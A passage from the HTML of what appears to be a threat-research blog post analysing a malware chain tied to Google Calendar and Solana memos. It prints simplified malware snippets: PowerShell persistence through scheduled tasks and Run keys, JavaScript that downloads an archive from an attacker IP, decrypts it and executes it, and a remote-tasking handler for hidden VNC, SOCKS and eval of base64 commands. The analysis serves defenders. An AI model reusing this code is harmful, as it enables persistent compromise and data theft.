19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_3be5102642cc9bead40ad8b9602ada9e\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_3be5102642cc9bead40ad8b9602ada9e\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\" selected>Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\">JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-auto\">\/\/ inside script_zombi\r\nschtasks \/create \/tn &quot;UpdateApp&quot; \/tr &quot;powershell -ExecutionPolicy Bypass -File ${ps1Path}&quot; \/sc onstart \/rl highest \/f\r\n$rPath = &quot;HKCU:\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run&quot;\r\n$command = &quot;powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File ${ps1Path}&quot;\r\nNew-ItemProperty -Path $rPath -Name $randomName -PropertyType String -Value $command -Force<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-3\">Stage 2<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">How the chain continues after Google Calendar<\/h3>\n\n\n\n<p>The code fetched during the Google Calendar stage serves as both a collection and delivery component. It downloads additional modules, extracts browser and wallet data, compresses and encrypts the results, and sends them back to attacker controlled infrastructure. It also includes real-time communication and peer-to-peer components, namely:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>socket[.]io-client<\/code><\/li>\n\n\n\n<li><code>engine[.]io-client<\/code><\/li>\n\n\n\n<li><code>ws<\/code><\/li>\n\n\n\n<li><code>k-rpc-socket<\/code><\/li>\n\n\n\n<li><code>bittorrent-dht<\/code><\/li>\n<\/ul>\n\n\n\n<p>It even references public DHT bootstrap nodes including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>router[.]bittorrent[.]com<\/code><\/li>\n\n\n\n<li><code>router[.]utorrent[.]com<\/code><\/li>\n\n\n\n<li><code>dht[.]transmissionbt[.]com<\/code><\/li>\n<\/ul>\n\n\n\n<p>Additionally, it performs another Solana memo lookup against the hardcoded wallet address <code>BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC<\/code> and uses the returned memo data to continue the execution chain. Here, The RPC provider list is rebuilt again, this time expanded with additional endpoints such as:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>https[:]\/\/public[.]rpc[.]solanavibestation[.]com<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/sol-protect[.]rpc[.]blxrbdn[.]com<\/code><\/li>\n<\/ul>\n\n\n\n<p>This same wallet was also mentioned in public reporting by <a href=\"https:\/\/www.koi.ai\/blog\/glassworm-goes-mac-fresh-infrastructure-new-tricks\">Koi<\/a>, as well as in later reporting by <a href=\"https:\/\/socket.dev\/blog\/glassworm-loader-hits-open-vsx-via-suspected-developer-account-compromise\">Socket<\/a> on the oorzc case.<\/p>\n\n\n\n<p>The snippet below shows how the malware downloads and archive from <code>http[:]\/\/45[.]32[.]150[.]251\/get_arhive_npm\/wBTsMvl78kbdYOVuAeE0Fw%3D%3D<\/code>, extracts it, decrypts its contents, and executes the next flow:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_2b5f05e69e341b99ff729579628a0b11\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_2b5f05e69e341b99ff729579628a0b11\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">fetch(atob(AGeZdIX2[&quot;_ASAR_ARHIVE_&quot;]))\r\n  .then((r) =&gt; r.arrayBuffer())\r\n  .then(async (r) =&gt; {\r\n    fs.writeFileSync(arhivePath, Buffer.from(r));\r\n    new AdmZip(arhivePath).extractAllTo(unzipPATH);\r\n\r\n    const decipher = crypto.createDecipheriv(&quot;aes-128-cbc&quot;, _key, _iv);\r\n    const decryptedData = Buffer.concat([\r\n      decipher.update(Buffer.from(data)),\r\n      decipher.final()\r\n    ]);\r\n\r\n    child_process.exec(`start \/B ${path_node} -e &quot;eval(atob(&#039;${btoa(script2)}&#039;))&quot;`);\r\n  });\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>The same stage also handles interactive remote commands, including hidden VNC, SOCKS proxying, system information collection, and execution of a base64 decoded payload delivered in the command field:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_c60090571022d6881fcc0a6edf18a98c\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_c60090571022d6881fcc0a6edf18a98c\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">if (wrPQKF.type == &quot;start_hvnc&quot;) {\r\n  RmYcPxyOw(AGeZdIX_dht);\r\n  return;\r\n}\r\n\r\nif (wrPQKF.type == &quot;start_socks&quot;) {\r\n  downloadManager.setHandler(&quot;start_socks&quot;);\r\n  downloadManager._x64_downloadAndRunFile(AGeZdIX_dht);\r\n  return;\r\n}\r\n\r\nif (wrPQKF.type == &quot;get_system_info&quot;) {\r\n  io_emitter.emit(&quot;task&quot;, { type: wrPQKF.type, value: JSON.stringify(getSystemInfo()) });\r\n  return;\r\n}\r\n\r\nif (wrPQKF?.command) {\r\n  eval(atob(wrPQKF.command));\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>It supports <code>stop_hvnc<\/code> and <code>stop_socks<\/code> which shows that this part of the malware is built to receive and act on remote tasking rather than simply fetch another payload.<\/p>\n\n\n\n<p>The code also includes BitTorrent DHT and persistent socket communication components, which help support that control layer:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 